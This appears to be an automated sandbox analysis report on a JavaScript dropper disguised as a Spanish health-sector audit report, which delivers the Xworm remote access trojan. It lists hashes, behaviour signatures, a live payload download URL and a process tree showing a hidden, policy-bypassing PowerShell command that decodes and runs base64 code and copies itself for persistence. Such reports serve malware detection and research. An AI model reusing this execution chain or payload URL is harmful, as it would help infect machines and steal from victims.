Analysis

  • max time kernel
    136s
  • max time network
    149s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250619-en
  • resource tags

    arch:x64 arch:x86 image:win11-20250619-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    02/07/2025, 18:52

General

  • Target

    NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js

  • Size

    19KB

  • MD5

    9f6c707c6678a8c0bf0d1fe1412b26a6

  • SHA1

    3c6425c1a5dbfe0a425ee46cc1a4b9a4f8fb8ed1

  • SHA256

    0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1

  • SHA512

    c8c469d76efbde71a296f7c59537b58475a6359e823ac6800e5bc0c1b1f6f442b665fd4d0401f55da8cc8426002d686ed7af6046a22ae38f6bbec173c3127b29

  • SSDEEP

    192:QTV70IM2f2BWAK/Mbk2B6BnLWlxj4eO05VG8IUZYDanl:0V1M2+M+bdYNc7v1IUyDo

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg

exe.dropper

https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell and hides the display window.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUDITORIA_SISTEMAS_DE_SALUD_ENTIDADES_PRESTADORAS.js
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:5116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\agnosticism.js"
        3⤵
          PID:4060
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          3⤵
            PID:1428
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            3⤵
              PID:956
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
              3⤵
                PID:4948
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                3⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4552
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c C:\Users\Public\Downloads\agnosticism.js
            1⤵
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:5016
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Public\Downloads\agnosticism.js"
              2⤵
              • Blocklisted process makes network request
              • Suspicious use of WriteProcessMemory
              PID:1412
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$absolutions='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';$Paleocene=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($absolutions));Invoke-Expression $Paleocene"
                3⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Adds Run key to start application
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1308
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                  4⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5004

          Network

                MITRE ATT&CK Enterprise v16

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  3KB

                  MD5

                  8db89638d25eb835085ddae51b7df0ff

                  SHA1

                  6b06c8b024f2b5bbcb0ca2323aac080ca2b101dd

                  SHA256

                  b76abef376e058bbf246be196a0de223552b11bce715cf65f6073f678164de35

                  SHA512

                  64919bb2796afcd347264233053d7275c8171e544ce02313f21a77d26bdbfc5af0e9ab069cb256d1ce1996019c6fb320a5880bb4556ef0748ef3bf8dd17e05e8

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  7b5fe43dda2544ecf1948d765ad2a49a

                  SHA1

                  b9a52f5a2981e7dcc1046e91fd3f78e216bf9578

                  SHA256

                  5d441b6c6a153bed01c7e976a0f82e67e38f043f8b0296ae56a57024a7441830

                  SHA512

                  8146dc9526ebba7fcd7c8258759a6212cac27fc70afe1ddc712409d1af757cef4d7944aa2856962d8f05c0f569fe9b3e2302d7ca42d6f3f49d085b12ef46a926

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_moyeartk.5o1.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Public\Downloads\agnosticism.js

                  Filesize

                  19KB

                  MD5

                  9b49b1a2e0327767db6dc4883654dd22

                  SHA1

                  486be1d6c5d4f2f6d7b80613aeae32ed3a7a69ba

                  SHA256

                  761b67f0715d7f89c50cdb2dd4a18a49952a21d301907bafbaf0942179afdb30

                  SHA512

                  b473926aa77d0827eefeafc7ee8a59989e936ef3c0b7b316b0ab5eb7a34a993c2734419c7a80c8505904dcdb31c672156f33fe6e26084b3d8e8c1b565f6bc206
